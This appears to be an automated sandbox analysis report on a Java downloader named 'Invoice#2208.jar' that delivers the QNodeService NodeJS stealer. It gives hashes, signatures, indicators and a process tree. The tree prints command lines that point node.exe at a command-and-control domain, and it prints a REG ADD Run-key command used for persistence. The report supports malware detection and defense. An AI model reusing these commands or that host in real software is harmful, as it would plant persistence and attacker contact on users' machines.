Analysis
-
max time kernel
86s -
max time network
125s -
platform
windows10_x64 -
resource
win10 -
submitted
26-10-2020 14:02
Static task
static1
Behavioral task
behavioral1
Sample
Invoice#2208.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Invoice#2208.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Invoice#2208.jar
-
Size
76KB
-
MD5
7093c1ec98624a2f52cde9e290c4b21c
-
SHA1
5df109a68ed6beead5952ee36007571fdd483994
-
SHA256
e3fcf0a8d553c5bc5061798ccb1a4c08d17ad653331f83b0d7151cd8d3f5735a
-
SHA512
310907dc6036a0fdcb77945910e18eb49f0900036a3165124f34a644d4a6e8e01c07b28dd64110e2d18ef98ba9ed879b269acc472742cef8b33599737e0d3654
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1224 node.exe 1808 node.exe 2244 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\af39b31f-4647-4840-8996-0386ebf0f08a = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab5b-171.dat js behavioral2/files/0x000100000001ab5b-175.dat js behavioral2/files/0x000100000001ab5b-179.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 wtfismyip.com 22 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1224 node.exe 1224 node.exe 1224 node.exe 1224 node.exe 1808 node.exe 1808 node.exe 1808 node.exe 1808 node.exe 2244 node.exe 2244 node.exe 2244 node.exe 2244 node.exe 2244 node.exe 2244 node.exe 2244 node.exe 2244 node.exe 2244 node.exe 2244 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4700 wrote to memory of 3996 4700 java.exe 75 PID 4700 wrote to memory of 3996 4700 java.exe 75 PID 3996 wrote to memory of 1224 3996 javaw.exe 79 PID 3996 wrote to memory of 1224 3996 javaw.exe 79 PID 1224 wrote to memory of 1808 1224 node.exe 81 PID 1224 wrote to memory of 1808 1224 node.exe 81 PID 1808 wrote to memory of 2244 1808 node.exe 82 PID 1808 wrote to memory of 2244 1808 node.exe 82 PID 2244 wrote to memory of 2260 2244 node.exe 84 PID 2244 wrote to memory of 2260 2244 node.exe 84 PID 2260 wrote to memory of 4248 2260 cmd.exe 85 PID 2260 wrote to memory of 4248 2260 cmd.exe 85
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Invoice#2208.jar1⤵
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\71b1c6e8.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain success87.hopto.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VrWp0d\boot.js --hub-domain success87.hopto.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VrWp0d\boot.js --hub-domain success87.hopto.org5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "af39b31f-4647-4840-8996-0386ebf0f08a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "af39b31f-4647-4840-8996-0386ebf0f08a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:4248
-
-
-
-
-
-